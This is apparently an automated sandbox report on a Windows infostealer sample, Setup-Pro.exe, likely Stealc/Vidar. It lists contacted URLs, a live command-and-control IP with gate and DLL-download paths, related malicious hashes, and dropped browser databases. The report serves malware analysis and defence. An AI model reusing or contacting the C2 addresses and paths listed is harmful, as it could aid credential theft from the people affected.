                                      http://45.66.249.162/9e6547173a597645.phpOSTBitLockerToGo.exe, 00000002.00000002.1852878198.00000000296C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        https://duckduckgo.com/ac/?q=BitLockerToGo.exe, 00000002.00000003.1654990713.00000000035D5000.00000004.00000020.00020000.00000000.sdmp, BKJEGDGI.2.drfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://github.com/aws/jsiiSetup-Pro.exe, program.js.0.drfalse
                                          unknown
                                          http://json-schema.org/schemaSetup-Pro.exe, program.js.0.drfalse
                                            unknown
                                            https://github.com/jprichardson/node-fs-extra/issues/269program.js.0.drfalse
                                              unknown
                                              http://45.66.249.162/9e6547173a597645.phpgVBitLockerToGo.exe, 00000002.00000002.1852878198.00000000296C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=BitLockerToGo.exe, 00000002.00000003.1654990713.00000000035D5000.00000004.00000020.00020000.00000000.sdmp, BKJEGDGI.2.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYiFIJECAEHJJJKJKFIDGCB.2.drfalse
                                                  unknown
                                                  http://45.66.249.162/9e6547173a597645.php6BitLockerToGo.exe, 00000002.00000002.1837091006.0000000003587000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
                                                    http://45.66.249.162/9e6547173a597645.php)SBitLockerToGo.exe, 00000002.00000002.1852878198.00000000296C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://raw.githubusercontent.com/ajv-validator/ajv/master/lib/refs/data.json#program.js.0.drfalse
                                                        unknown
                                                        http://json-schema.org/draft-07/schemaSetup-Pro.exe, program.js.0.drfalse
                                                          unknown
                                                          http://45.66.249.162/9e6547173a597645.phpl)BitLockerToGo.exe, 00000002.00000002.1852878198.00000000296C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            http://45.66.249.162/9e6547173a597645.phpoinomiBitLockerToGo.exe, 00000002.00000002.1837091006.00000000035A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              unknown
                                                              http://45.66.249.162CAEBABitLockerToGo.exe, 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                unknown
                                                                http://45.66.249.162/9e6547173a597645.phpFBitLockerToGo.exe, 00000002.00000002.1837091006.0000000003587000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchBitLockerToGo.exe, 00000002.00000003.1654990713.00000000035D5000.00000004.00000020.00020000.00000000.sdmp, BKJEGDGI.2.drfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://45.66.249.162BitLockerToGo.exe, 00000002.00000002.1837091006.0000000003547000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmptrue
                                                                    unknown
                                                                    http://45.66.249.162/55145c8889ec57f2/sqlite3.dllHBitLockerToGo.exe, 00000002.00000002.1837091006.0000000003587000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      http://45.66.249.162/55145c8889ec57f2/vcruntime140.dll6BitLockerToGo.exe, 00000002.00000002.1837091006.0000000003587000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        http://45.66.249.162/55145c8889ec57f2/mozglue.dllzBitLockerToGo.exe, 00000002.00000002.1837091006.0000000003587000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          http://www.sqlite.org/copyright.html.BitLockerToGo.exe, 00000002.00000002.1858384056.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1847494467.000000001D530000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://45.66.249.162/9e6547173a597645.phpHIDBAEGIIIDHJKEGDBBitLockerToGo.exe, 00000002.00000002.1837091006.0000000003587000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            http://45.66.249.162/9e6547173a597645.phprbirdBitLockerToGo.exe, 00000002.00000002.1837091006.00000000035A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              http://45.66.249.1621BitLockerToGo.exe, 00000002.00000002.1837091006.0000000003547000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                http://www.mozilla.com/en-US/blocklist/BitLockerToGo.exe, BitLockerToGo.exe, 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.drfalse
                                                                                  unknown
                                                                                  https://mozilla.org0/freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoBitLockerToGo.exe, 00000002.00000003.1654990713.00000000035D5000.00000004.00000020.00020000.00000000.sdmp, BKJEGDGI.2.drfalse
                                                                                    unknown
                                                                                    http://json-schema.org/draft-07/schema#program.js.0.drfalse
                                                                                      unknown
                                                                                      https://aws.amazon.comSetup-Pro.exe, program.js.0.drfalse
                                                                                        unknown
                                                                                        https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6lHJEHIJEBKEBFBFHIIDHIIDGIJE.2.drfalse
                                                                                          unknown
                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=BitLockerToGo.exe, 00000002.00000003.1654990713.00000000035D5000.00000004.00000020.00020000.00000000.sdmp, BKJEGDGI.2.drfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          http://45.66.249.162/9e6547173a597645.phprBitLockerToGo.exe, 00000002.00000002.1837091006.0000000003587000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            http://45.66.249.162/55145c8889ec57f2/nss3.dll88BitLockerToGo.exe, 00000002.00000002.1837091006.0000000003547000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.BitLockerToGo.exe, 00000002.00000002.1837091006.00000000035A1000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1852878198.00000000296C0000.00000004.00000020.00020000.00000000.sdmp, FIJECAEHJJJKJKFIDGCB.2.drfalse
                                                                                                unknown
                                                                                                https://www.ecosia.org/newtab/BitLockerToGo.exe, 00000002.00000003.1654990713.00000000035D5000.00000004.00000020.00020000.00000000.sdmp, BKJEGDGI.2.drfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brHJEHIJEBKEBFBFHIIDHIIDGIJE.2.drfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44BitLockerToGo.exe, 00000002.00000002.1837091006.00000000035A1000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1852878198.00000000296C0000.00000004.00000020.00020000.00000000.sdmp, FIJECAEHJJJKJKFIDGCB.2.drfalse
                                                                                                  unknown
                                                                                                  https://ac.ecosia.org/autocomplete?q=BitLockerToGo.exe, 00000002.00000003.1654990713.00000000035D5000.00000004.00000020.00020000.00000000.sdmp, BKJEGDGI.2.drfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://github.com/aws/jsii.gitSetup-Pro.exe, program.js.0.drfalse
                                                                                                    unknown
                                                                                                    http://45.66.249.162/9e6547173a597645.phpyVBitLockerToGo.exe, 00000002.00000002.1852878198.00000000296C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      http://45.66.249.162/9e6547173a597645.phpndowsAppsBitLockerToGo.exe, 00000002.00000002.1837091006.00000000035A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgBitLockerToGo.exe, 00000002.00000002.1837091006.00000000035A1000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1852878198.00000000296C0000.00000004.00000020.00020000.00000000.sdmp, FIJECAEHJJJKJKFIDGCB.2.drfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        http://45.66.249.162/9e6547173a597645.phpition:BitLockerToGo.exe, 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&uBitLockerToGo.exe, 00000002.00000002.1837091006.00000000035A1000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1852878198.00000000296C0000.00000004.00000020.00020000.00000000.sdmp, FIJECAEHJJJKJKFIDGCB.2.drfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          https://github.com/aws/jsii/issuesSetup-Pro.exe, program.js.0.drfalse
                                                                                                            unknown
                                                                                                            http://45.66.249.162/9e6547173a597645.phpowserBitLockerToGo.exe, 00000002.00000002.1837091006.00000000035A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&ctaBitLockerToGo.exe, 00000002.00000002.1837091006.00000000035A1000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1852878198.00000000296C0000.00000004.00000020.00020000.00000000.sdmp, FIJECAEHJJJKJKFIDGCB.2.drfalse
                                                                                                                unknown
                                                                                                                https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgBitLockerToGo.exe, 00000002.00000002.1837091006.00000000035A1000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1852878198.00000000296C0000.00000004.00000020.00020000.00000000.sdmp, FIJECAEHJJJKJKFIDGCB.2.drfalse
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                http://45.66.249.162/55145c8889ec57f2/softokn3.dll4BitLockerToGo.exe, 00000002.00000002.1837091006.0000000003587000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  https://support.mozilla.orgHJEHIJEBKEBFBFHIIDHIIDGIJE.2.drfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  http://45.66.249.162/9e6547173a597645.php&VBitLockerToGo.exe, 00000002.00000002.1852878198.00000000296C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    http://45.66.249.162/9e6547173a597645.phppVBitLockerToGo.exe, 00000002.00000002.1852878198.00000000296C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=BitLockerToGo.exe, 00000002.00000003.1654990713.00000000035D5000.00000004.00000020.00020000.00000000.sdmp, BKJEGDGI.2.drfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      • No. of IPs < 25%
                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                      • 75% < No. of IPs
                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                      45.66.249.162
                                                                                                                      unknownRussian Federation
                                                                                                                      53356FREERANGECLOUDCAtrue
                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                      Analysis ID:1531862
                                                                                                                      Start date and time:2024-10-11 22:31:09 +02:00
                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                      Overall analysis duration:0h 6m 48s
                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                      Report type:full
                                                                                                                      Cookbook file name:default.jbs
                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                      Number of analysed new started processes analysed:7
                                                                                                                      Number of new started drivers analysed:0
                                                                                                                      Number of existing processes analysed:0
                                                                                                                      Number of existing drivers analysed:0
                                                                                                                      Number of injected processes analysed:0
                                                                                                                      Technologies:
                                                                                                                      • HCA enabled
                                                                                                                      • EGA enabled
                                                                                                                      • AMSI enabled
                                                                                                                      Analysis Mode:default
                                                                                                                      Analysis stop reason:Timeout
                                                                                                                      Sample name:Setup-Pro.exe
                                                                                                                      Detection:MAL
                                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@3/27@0/1
                                                                                                                      EGA Information:
                                                                                                                      • Successful, ratio: 50%
                                                                                                                      HCA Information:
                                                                                                                      • Successful, ratio: 100%
                                                                                                                      • Number of executed functions: 82
                                                                                                                      • Number of non-executed functions: 126
                                                                                                                      Cookbook Comments:
                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                      • Stop behavior analysis, all processes terminated
                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                                                                                                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                      • Execution Graph export aborted for target Setup-Pro.exe, PID 7596 because there are no executed function
                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                      • VT rate limit hit for: Setup-Pro.exe
                                                                                                                      No simulations
                                                                                                                      No context
                                                                                                                      No context
                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      FREERANGECLOUDCAforest.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 45.66.249.249
                                                                                                                      forest.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 45.66.249.249
                                                                                                                      arm.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                      • 23.129.35.4
                                                                                                                      SecuriteInfo.com.Trojan.PWS.Siggen3.33653.31886.3628.exeGet hashmaliciousRaccoon Stealer v2Browse
                                                                                                                      • 193.142.147.59
                                                                                                                      SecuriteInfo.com.Trojan.PackedNET.2334.3801.19434.exeGet hashmaliciousPureLog Stealer, Raccoon Stealer v2, SmokeLoaderBrowse
                                                                                                                      • 193.142.147.59
                                                                                                                      Setup.exeGet hashmaliciousAsyncRAT, HTMLPhisher, Clipboard Hijacker, Phorpiex, PureLog Stealer, Raccoon Stealer v2, RedLineBrowse
                                                                                                                      • 193.142.147.59
                                                                                                                      http://www.brookskushman.comGet hashmaliciousUnknownBrowse
                                                                                                                      • 45.66.248.122
                                                                                                                      http://www.prestigetransportation.comGet hashmaliciousUnknownBrowse
                                                                                                                      • 45.66.248.122
                                                                                                                      https://dutchpopp.comGet hashmaliciousUnknownBrowse
                                                                                                                      • 45.66.248.122
                                                                                                                      http://muse.krazzykriss.comGet hashmaliciousUnknownBrowse
                                                                                                                      • 45.66.248.122
                                                                                                                      No context
                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      C:\ProgramData\freebl3.dllfile.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                        file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                          file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                            SecuriteInfo.com.Win32.Evo-gen.28528.9811.exeGet hashmaliciousLummaC, Amadey, Stealc, VidarBrowse
                                                                                                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                        file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                          C:\ProgramData\mozglue.dllfile.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                            file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                SecuriteInfo.com.Win32.Evo-gen.28528.9811.exeGet hashmaliciousLummaC, Amadey, Stealc, VidarBrowse
                                                                                                                                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                        file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                          file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                            file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                              Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):196608
                                                                                                                                                              Entropy (8bit):1.1209886597424439
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                                                                                                              MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                                                                                                              SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                                                                                                              SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                                                                                                              SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):20480
                                                                                                                                                              Entropy (8bit):0.8475592208333753
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBOF30AvJ3qj/880C4pwE1:TeAFawNLopFgU10XJBORJ6px4p7
                                                                                                                                                              MD5:BE99679A2B018331EACD3A1B680E3757
                                                                                                                                                              SHA1:6E6732E173C91B0C3287AB4B161FE3676D33449A
                                                                                                                                                              SHA-256:C382A020682EDEE086FBC56D11E70214964D39318774A19B184672E9FD0DD3E0
                                                                                                                                                              SHA-512:9CFE1932522109D73602A342A15B7326A3E267B77FFF0FC6937B6DD35A054BF4C10ED79D34CA38D56330A5B325E08D8AFC786A8514C59ABB896864698B6DE099
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):106496
                                                                                                                                                              Entropy (8bit):1.1373607036346451
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
                                                                                                                                                              MD5:64BCCF32ED2142E76D142DF7AAC75730
                                                                                                                                                              SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
                                                                                                                                                              SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
                                                                                                                                                              SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):40960
                                                                                                                                                              Entropy (8bit):0.8553638852307782
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:high, very likely benign file
                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (1765), with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):9976
                                                                                                                                                              Entropy (8bit):5.499944288613473
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:NzKneRdpYbBp6znmUzaX/6aRMKWPzDNBw8DK9mSl:Nz5eUmUtgmrwbw0
                                                                                                                                                              MD5:42594FD09C4DF3B174CF5D59B1CAB13A
                                                                                                                                                              SHA1:1B78FEB748C36A592C468A76BB60E98187D7BE4A
                                                                                                                                                              SHA-256:F8B55E3B04E0A59BB745C43763D8FBC1CFFDBC247B5525A489B4B74A57319393
                                                                                                                                                              SHA-512:E2430AB14ADF2EF1CC2CB1F96DEADAFB3598B803A5E7724FDDB68ACF015D7E052291626A3D100FED902731DBFD10A9AE3387581AD2867F64D0B27E8D51B9069F
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "38829aa4-f57e-4fd8-bfd3-d094d57ae30f");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696493966);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696493970);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                                                                                              Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                              File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):98304
                                                                                                                                                              Entropy (8bit):0.08235737944063153
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                              MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                              SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                              SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                              SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                              File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):5242880
                                                                                                                                                              Entropy (8bit):0.03708713717387235
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:58rJQaXoMXp0VW9FxW/Hy4XJwvnzfXfYf6zfTfN/0DApVJCI:58r54w0VW3xW/bXWzvACzbJ0DApVJ
                                                                                                                                                              MD5:85D6E1D7F82C11DAC40C95C06B7B5DC5
                                                                                                                                                              SHA1:96EA790BA7A295D78AD5A5019D7EA5E9E8F4B0BD
                                                                                                                                                              SHA-256:D9AD18D2A91CB42FD55695B562D76337BBB4A6AEB45D28C4554297B4EE0DC800
                                                                                                                                                              SHA-512:5DD2B75138EFB9588E14997D84C23C8225F9BFDCEA6A2A1D542AD2C6728484E7E578F06C4BA238853EAD9BE5F9A7CCCF7B2B49A0583FF93D67F072F2C5165B14
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):51200
                                                                                                                                                              Entropy (8bit):0.8746135976761988
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                              MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                              SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                              SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                              SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):20480
                                                                                                                                                              Entropy (8bit):0.6732424250451717
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
